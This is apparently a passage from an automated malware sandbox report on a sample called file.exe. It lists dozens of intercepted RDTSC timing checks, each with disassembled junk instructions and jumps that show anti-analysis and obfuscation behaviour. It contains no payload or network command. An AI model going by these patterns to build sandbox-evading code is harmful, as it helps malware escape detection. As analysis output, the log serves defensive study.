        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A93F9 second address: 7A93FE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A955C second address: 7A9589 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jng 00007FA1CCF9D8B6h 0x00000009 push edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f jc 00007FA1CCF9D8C9h 0x00000015 pushad 0x00000016 popad 0x00000017 jmp 00007FA1CCF9D8C1h 0x0000001c pushad 0x0000001d push esi 0x0000001e pop esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9589 second address: 7A958F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A981B second address: 7A983D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA1CCF9D8C8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A983D second address: 7A9841 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9841 second address: 7A9845 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9845 second address: 7A984E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A984E second address: 7A9884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCF9D8C1h 0x00000009 jmp 00007FA1CCF9D8C3h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jc 00007FA1CCF9D8B6h 0x0000001c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9884 second address: 7A988C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A988C second address: 7A989D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1CCF9D8BDh 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A989D second address: 7A98A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9A03 second address: 7A9A07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9DF0 second address: 7A9DF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A9DF8 second address: 7A9DFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AD592 second address: 7AD599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AD599 second address: 7AD5A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA1CCF9D8B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF9B4 second address: 7AF9B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF9B8 second address: 7AF9C8 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA1CCF9D8B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF9C8 second address: 7AFA1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FA1CCCD2157h 0x0000000c pop ecx 0x0000000d jl 00007FA1CCCD214Ch 0x00000013 jbe 00007FA1CCCD2146h 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FA1CCCD2154h 0x00000020 jmp 00007FA1CCCD2153h 0x00000025 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AFA1C second address: 7AFA20 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF4EE second address: 7AF503 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD2150h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF668 second address: 7AF6AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnl 00007FA1CCF9D8BCh 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FA1CCF9D8C6h 0x00000016 popad 0x00000017 push edi 0x00000018 jno 00007FA1CCF9D8B6h 0x0000001e jmp 00007FA1CCF9D8BDh 0x00000023 pop edi 0x00000024 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF6AB second address: 7AF6CE instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA1CCCD2148h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA1CCCD2151h 0x00000011 jp 00007FA1CCCD2146h 0x00000017 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B2597 second address: 7B25B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B25B6 second address: 7B25C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCCD214Ch 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B25C6 second address: 7B25DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007FA1CCF9D8B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d js 00007FA1CCF9D8B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BA8C0 second address: 7BA8DB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnc 00007FA1CCCD2146h 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA1CCCD214Fh 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BA8DB second address: 7BA8DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BAB8D second address: 7BABC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jmp 00007FA1CCCD2154h 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007FA1CCCD2159h 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BABC9 second address: 7BABCD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BABCD second address: 7BABD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C11A3 second address: 7C11A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C11A7 second address: 7C11C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FA1CCCD2154h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BF9F7 second address: 7BF9FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BFC94 second address: 7BFC9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BFC9A second address: 7BFC9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BFC9E second address: 7BFCA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BFCA4 second address: 7BFCB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007FA1CCF9D8B6h 0x0000000d jc 00007FA1CCF9D8B6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7BFDF3 second address: 7BFDF9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C00C3 second address: 7C00E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C8h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C039C second address: 7C03A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C03A2 second address: 7C03C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA1CCF9D8B6h 0x0000000a popad 0x0000000b je 00007FA1CCF9D8C7h 0x00000011 jmp 00007FA1CCF9D8BFh 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C03C4 second address: 7C03EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 jmp 00007FA1CCCD2159h 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C0E27 second address: 7C0E58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jnc 00007FA1CCF9D8B6h 0x00000011 jmp 00007FA1CCF9D8C3h 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d jo 00007FA1CCF9D8B6h 0x00000023 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C9A22 second address: 7C9A26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C7A0E second address: 7C7A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C7FF6 second address: 7C8018 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA1CCCD214Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FA1CCCD2152h 0x00000012 jp 00007FA1CCCD2146h 0x00000018 ja 00007FA1CCCD2146h 0x0000001e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C82CD second address: 7C82F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA1CCF9D8C8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C82F0 second address: 7C830D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FA1CCCD214Dh 0x0000000f jng 00007FA1CCCD2146h 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C830D second address: 7C8324 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007FA1CCF9D8BDh 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C8324 second address: 7C8336 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD214Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C8EF1 second address: 7C8EF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C9711 second address: 7C9716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C9716 second address: 7C972F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FA1CCF9D8BEh 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7C972F second address: 7C9736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE1FA second address: 7CE1FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE1FE second address: 7CE204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE204 second address: 7CE20D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CE622 second address: 7CE629 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7CEB84 second address: 7CEBB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1CCF9D8C4h 0x00000008 jmp 00007FA1CCF9D8BCh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f je 00007FA1CCF9D8B6h 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DB99B second address: 7DB9D6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA1CCCD215Bh 0x00000008 jmp 00007FA1CCCD2155h 0x0000000d push edx 0x0000000e jnc 00007FA1CCCD2146h 0x00000014 pop edx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push eax 0x0000001a pop eax 0x0000001b jnp 00007FA1CCCD2146h 0x00000021 pop eax 0x00000022 pushad 0x00000023 js 00007FA1CCCD2146h 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D9F3C second address: 7D9F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DA0AB second address: 7DA0B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jo 00007FA1CCCD214Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DA0B8 second address: 7DA0D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCF9D8C5h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DA0D8 second address: 7DA0DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DA0DE second address: 7DA0FF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FA1CCF9D8C1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jl 00007FA1CCF9D8B6h 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DA0FF second address: 7DA11B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD2158h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DA11B second address: 7DA123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DA253 second address: 7DA262 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FA1CCCD2146h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DA262 second address: 7DA266 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DA3C8 second address: 7DA3CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DA522 second address: 7DA526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DA526 second address: 7DA52A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7DA911 second address: 7DA934 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 jmp 00007FA1CCF9D8C3h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7D9674 second address: 7D968F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA1CCCD2146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FA1CCCD214Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2D14 second address: 7E2D18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2D18 second address: 7E2D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2D1E second address: 7E2D34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FA1CCF9D8BBh 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E2D34 second address: 7E2D3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7E5CD8 second address: 7E5CF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C0h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA1CCF9D8BBh 0x0000000e rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0789 second address: 7F078F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F0337 second address: 7F0341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FA1CCF9D8B6h 0x0000000a rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F6264 second address: 7F627D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jmp 00007FA1CCCD214Dh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F627D second address: 7F6284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F6284 second address: 7F62A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FA1CCCD2146h 0x0000000a jmp 00007FA1CCCD2159h 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F62A7 second address: 7F62CA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b ja 00007FA1CCF9D8BCh 0x00000011 push edi 0x00000012 jne 00007FA1CCF9D8B6h 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F62CA second address: 7F62CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5BED second address: 7F5BF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5BF1 second address: 7F5BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5BF7 second address: 7F5C07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FA1CCF9D8B6h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5C07 second address: 7F5C0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5C0B second address: 7F5C33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1CCF9D8C7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jg 00007FA1CCF9D8B6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5C33 second address: 7F5C42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jg 00007FA1CCCD2146h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7F5C42 second address: 7F5C48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7FADB7 second address: 7FADD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FA1CCCD2153h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
